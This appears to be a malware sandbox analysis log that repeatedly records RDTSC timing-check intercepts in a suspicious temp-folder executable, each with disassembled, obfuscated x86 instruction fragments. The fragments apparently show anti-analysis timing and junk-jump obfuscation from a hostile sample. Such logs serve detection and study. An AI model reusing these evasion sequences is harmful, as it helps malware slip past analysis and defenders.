Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A9020E second address: 4A90212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A90212 second address: 4A90218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AB0765 second address: 4AB081F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF7CBD5D40h 0x00000009 and ax, C518h 0x0000000e jmp 00007FAF7CBD5D3Bh 0x00000013 popfd 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ecx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FAF7CBD5D40h 0x00000021 adc ah, 00000078h 0x00000024 jmp 00007FAF7CBD5D3Bh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007FAF7CBD5D48h 0x00000030 and ax, 49D8h 0x00000035 jmp 00007FAF7CBD5D3Bh 0x0000003a popfd 0x0000003b popad 0x0000003c mov eax, dword ptr [774365FCh] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push edx 0x00000045 pop eax 0x00000046 pushfd 0x00000047 jmp 00007FAF7CBD5D47h 0x0000004c or ecx, 31BB594Eh 0x00000052 jmp 00007FAF7CBD5D49h 0x00000057 popfd 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AB081F second address: 4AB0855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 7662h 0x00000007 jmp 00007FAF7C6A41B3h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test eax, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAF7C6A41B5h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AB0855 second address: 4AB0865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D3Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AB0993 second address: 4AB09A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AB09A2 second address: 4AB09C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx ecx, dx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AB09C6 second address: 4AB0A33 instructions: 0x00000000 rdtsc 0x00000002 call 00007FAF7C6A41AFh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b ret 0x0000000c nop 0x0000000d push eax 0x0000000e call 00007FAF80B753EBh 0x00000013 mov edi, edi 0x00000015 pushad 0x00000016 movsx edx, ax 0x00000019 mov bx, ax 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e jmp 00007FAF7C6A41B4h 0x00000023 push eax 0x00000024 pushad 0x00000025 mov cl, dl 0x00000027 jmp 00007FAF7C6A41AAh 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e jmp 00007FAF7C6A41B0h 0x00000033 mov ebp, esp 0x00000035 pushad 0x00000036 jmp 00007FAF7C6A41ADh 0x0000003b popad 0x0000003c pop ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AB0A33 second address: 4AB0A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AB0A37 second address: 4AB0A3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AB0A3D second address: 4AB0A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AB0A43 second address: 4AB0A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60016 second address: 4A60044 instructions: 0x00000000 rdtsc 0x00000002 mov ah, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, si 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov dl, 79h 0x0000000e call 00007FAF7CBD5D46h 0x00000013 mov edx, esi 0x00000015 pop esi 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b mov esi, edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60044 second address: 4A60109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAF7C6A41B0h 0x0000000a and esi, 4CFC63D8h 0x00000010 jmp 00007FAF7C6A41ABh 0x00000015 popfd 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov ax, 60ABh 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 and esp, FFFFFFF8h 0x00000025 jmp 00007FAF7C6A41B3h 0x0000002a xchg eax, ecx 0x0000002b pushad 0x0000002c mov ecx, 4A54908Bh 0x00000031 popad 0x00000032 push eax 0x00000033 jmp 00007FAF7C6A41ACh 0x00000038 xchg eax, ecx 0x00000039 pushad 0x0000003a mov cx, 832Dh 0x0000003e movzx ecx, dx 0x00000041 popad 0x00000042 push ecx 0x00000043 jmp 00007FAF7C6A41B2h 0x00000048 mov dword ptr [esp], ebx 0x0000004b jmp 00007FAF7C6A41B0h 0x00000050 mov ebx, dword ptr [ebp+10h] 0x00000053 jmp 00007FAF7C6A41B0h 0x00000058 xchg eax, esi 0x00000059 jmp 00007FAF7C6A41B0h 0x0000005e push eax 0x0000005f pushad 0x00000060 popad 0x00000061 xchg eax, esi 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FAF7C6A41ABh 0x0000006b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60109 second address: 4A60126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60126 second address: 4A60179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FAF7C6A41AEh 0x00000011 xchg eax, edi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FAF7C6A41AEh 0x00000019 adc esi, 088E53A8h 0x0000001f jmp 00007FAF7C6A41ABh 0x00000024 popfd 0x00000025 mov edx, eax 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov ch, DEh 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60179 second address: 4A60209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FAF7CBD5D40h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 mov bl, cl 0x00000014 mov esi, ebx 0x00000016 popad 0x00000017 je 00007FAFEF5241A1h 0x0000001d jmp 00007FAF7CBD5D45h 0x00000022 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FAF7CBD5D3Ch 0x00000030 add eax, 208765F8h 0x00000036 jmp 00007FAF7CBD5D3Bh 0x0000003b popfd 0x0000003c mov ah, 1Fh 0x0000003e popad 0x0000003f je 00007FAFEF524172h 0x00000045 jmp 00007FAF7CBD5D3Bh 0x0000004a mov edx, dword ptr [esi+44h] 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60209 second address: 4A6020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A6020D second address: 4A60228 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60228 second address: 4A6023D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 872Ah 0x00000007 mov cx, dx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d or edx, dword ptr [ebp+0Ch] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A6023D second address: 4A60244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, EFh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60244 second address: 4A6024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A6024A second address: 4A6024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A6024E second address: 4A6028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e jmp 00007FAF7C6A41B4h 0x00000013 jne 00007FAFEEFF25BEh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FAF7C6A41B7h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A6028F second address: 4A602CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d pushad 0x0000000e mov si, 1C33h 0x00000012 mov bh, ah 0x00000014 popad 0x00000015 jne 00007FAFEF52411Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAF7CBD5D3Eh 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A602CE second address: 4A602D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 61E2FBE4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A602D8 second address: 4A602F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test bl, 00000007h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7CBD5D44h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50846 second address: 4A508EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d call 00007FAF7C6A41B4h 0x00000012 push eax 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 mov ax, bx 0x00000018 popad 0x00000019 push esp 0x0000001a pushad 0x0000001b movzx ecx, di 0x0000001e pushad 0x0000001f mov di, CB52h 0x00000023 pushfd 0x00000024 jmp 00007FAF7C6A41B3h 0x00000029 jmp 00007FAF7C6A41B3h 0x0000002e popfd 0x0000002f popad 0x00000030 popad 0x00000031 mov dword ptr [esp], ebx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FAF7C6A41B4h 0x0000003b sbb ax, 1BC8h 0x00000040 jmp 00007FAF7C6A41ABh 0x00000045 popfd 0x00000046 mov eax, 50BDDD3Fh 0x0000004b popad 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FAF7C6A41B1h 0x00000054 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A508EC second address: 4A508FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D3Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A508FC second address: 4A50914 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50914 second address: 4A50918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50918 second address: 4A5091E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A5091E second address: 4A50924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50924 second address: 4A509AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAF7C6A41B4h 0x00000013 xor ecx, 40AE2618h 0x00000019 jmp 00007FAF7C6A41ABh 0x0000001e popfd 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FAF7C6A41B6h 0x00000026 jmp 00007FAF7C6A41B5h 0x0000002b popfd 0x0000002c mov edi, eax 0x0000002e popad 0x0000002f popad 0x00000030 mov esi, dword ptr [ebp+08h] 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 call 00007FAF7C6A41AFh 0x0000003b pop ecx 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A509AB second address: 4A50A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c mov ah, dl 0x0000000e pushfd 0x0000000f jmp 00007FAF7CBD5D46h 0x00000014 jmp 00007FAF7CBD5D45h 0x00000019 popfd 0x0000001a popad 0x0000001b test esi, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FAF7CBD5D3Dh 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50A08 second address: 4A50A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF7C6A41B7h 0x00000008 pushfd 0x00000009 jmp 00007FAF7C6A41B8h 0x0000000e xor ax, 2388h 0x00000013 jmp 00007FAF7C6A41ABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007FAFEEFF9AE5h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FAF7C6A41B5h 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50A6C second address: 4A50B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov si, C873h 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 mov ecx, esi 0x0000001b pushad 0x0000001c jmp 00007FAF7CBD5D41h 0x00000021 call 00007FAF7CBD5D40h 0x00000026 pushfd 0x00000027 jmp 00007FAF7CBD5D42h 0x0000002c adc eax, 5CD53DD8h 0x00000032 jmp 00007FAF7CBD5D3Bh 0x00000037 popfd 0x00000038 pop esi 0x00000039 popad 0x0000003a je 00007FAFEF52B5FDh 0x00000040 pushad 0x00000041 mov ax, bx 0x00000044 mov ecx, edi 0x00000046 popad 0x00000047 test byte ptr [77436968h], 00000002h 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FAF7CBD5D46h 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50B08 second address: 4A50B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAF7C6A41B1h 0x00000008 pop eax 0x00000009 call 00007FAF7C6A41B1h 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jne 00007FAFEEFF9A2Ah 0x00000018 pushad 0x00000019 mov cx, bx 0x0000001c mov edx, 023C5C0Ch 0x00000021 popad 0x00000022 mov edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50B4B second address: 4A50B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50B4F second address: 4A50B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50B55 second address: 4A50BC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FAF7CBD5D3Ah 0x00000010 mov dword ptr [esp], ebx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FAF7CBD5D3Eh 0x0000001a xor ch, FFFFFF88h 0x0000001d jmp 00007FAF7CBD5D3Bh 0x00000022 popfd 0x00000023 mov esi, 3FB57EFFh 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b push ecx 0x0000002c call 00007FAF7CBD5D47h 0x00000031 pop esi 0x00000032 pop edi 0x00000033 movzx ecx, di 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jmp 00007FAF7CBD5D3Dh 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50BC6 second address: 4A50C01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FAF7C6A41B6h 0x0000000f push dword ptr [ebp+14h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50C01 second address: 4A50C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50C05 second address: 4A50C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50C09 second address: 4A50C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50C0F second address: 4A50C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50C15 second address: 4A50C3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+10h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAF7CBD5D3Ch 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50C6F second address: 4A50C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50C85 second address: 4A50C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50C89 second address: 4A50C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50C8D second address: 4A50C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50C93 second address: 4A50C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A50C99 second address: 4A50C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E4E19 second address: 7E4E23 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E5056 second address: 7E505C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E505C second address: 7E5060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60A70 second address: 4A60A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60A76 second address: 4A60ACC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007FAF7C6A41B4h 0x0000000b sbb si, 16E8h 0x00000010 jmp 00007FAF7C6A41ABh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx ebx, cx 0x00000021 pushfd 0x00000022 jmp 00007FAF7C6A41ACh 0x00000027 sub ecx, 0AAB2948h 0x0000002d jmp 00007FAF7C6A41ABh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AE0714 second address: 4AE0742 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7CBD5D47h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AE0742 second address: 4AE0748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AE0748 second address: 4AE074C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AE074C second address: 4AE0750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AD09DD second address: 4AD09E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AD09E1 second address: 4AD09F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AD09F8 second address: 4AD09FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AD09FE second address: 4AD0A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AD0905 second address: 4AD090B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
